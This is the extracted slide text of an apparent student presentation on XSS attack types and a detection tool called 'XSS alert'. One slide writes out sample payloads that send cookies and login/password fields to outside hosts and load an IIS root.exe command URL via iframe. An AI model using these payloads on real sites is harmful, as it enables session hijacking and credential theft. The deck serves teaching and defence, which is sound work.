This presentation describe how XSS alert tool works

1. Cross Side Scripting (XSS) attack
detection for web application
http://sourceforge.net/projects/xssalert7/
Author: Arjun Jain (07104701)
Department of Computer Science and Information Technology
Jaypee Institute of Information Technology
Sector-62 Noida ,Uttar Pradesh

2. Agenda
 Overview of XSS attack
 Type of XSS attack
 Example
 Limitation of attack
 DOM security overview
 XSS alert working model
 Demo

3. What is Cross Side Scripting (XSS)
Cross-site scripting (XSS) is a type of computer security vulnerability typically found
in web applications that enables malicious attackers to inject client side script into
web pages viewed by other.
Types:
1: Reflected XSS
2: Stored XSS
3: DOM based XSS

4.  Ranked #1 in OWASP 2007 top 10
 Ranked #2 in OWASP 2010 top 10
 7 out of 10 sites have XSS ( Jeremiah Grossman, White Hat website security
statistics report, Oct 2007 )

5. Reflected XSS
It detect all non-persistent XSS issues which occur when a web application blindly
echo parts of the HTTP request in the corresponding HTTP response HTML.
Example :
<?php
$name= request.getParameter(“name”);
echo “Hey”.$name;
?>
$name may contain javascript.

6. Stored XSS
It refers to all XSS vulnerabilities, where the adversary is able to permanently inject
the malicious script in the vulnerable application storage . The result is every user
that accesses the poisoned web page received the injected script without further
action by the adversary.

7. DOM-based XSS
It is special variant of the reflected XSS, where logic errors in legitimate JavaScript
and careless usage of the client-side data result in XSS coordination.

8. Example

9. Invalidated input with XSS

10. Invalidated input with XSS

11. Invalidated input in XSS

12. Invalidated input in XSS
Invalidated Input and resulted in a Cross-Site Scripting attack
and the theft of the administrator’s Cookies.

13. Types of Information leakage
Client can reveal cookies to 3rd party (session state, order info, etc)
http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-
bin/cookie.cgi?'%20+document.cookie</script >
Client can reveal posted form items to 3rd party (userID/passwd, etc)
<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image;
hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value'+':'+
document.forms(1).password.value;" </form>
Client can be tricked into accessing/posting spoofed info to trusted server
www.trustedserver.com/xss.asp?name =
<iframe http://www.trustedserver.com/auth_area/orderupdate?items=4000 > </iframe>
Client can be tricked into attacking other sites
/hello.asp?name = <iframe src= http://vuln.iis.server/scripts/root.exe?/c+dir ></iframe>

14. Limitation of these attacks
 Usually only get one transaction with XSS code against vulnerable site
 Most attacks are only focused on collecting cookies
 POST based forms are seldom leveraged – almost always use GET methods
 Attacker does not know actual responses to client
 Some experts recommend using POST, hidden form inputs and other session
state info to limit XSS risks.

15. DOM Security Overview
 Child windows and same site trust
 Scripts can interact between the two windows
 Script content can be loaded from anywhere (RPC/Remote scripting is common)
 Images can be loaded from anywhere
 Javascript can either be within <script></script> tags, loaded elsewhere via
 <script src=remote.com>, or attacked to many tags
<img src=javascriptn load=javascript>
 Form GET/POST can be to another site or a javascript action
 XSS allows DOM abuse, but still follows DOM rules

16. XSS alert working model

18. Demo

19. Attack on Yahoo server with get string
“?q=”

20. Final Result

21. Thank You !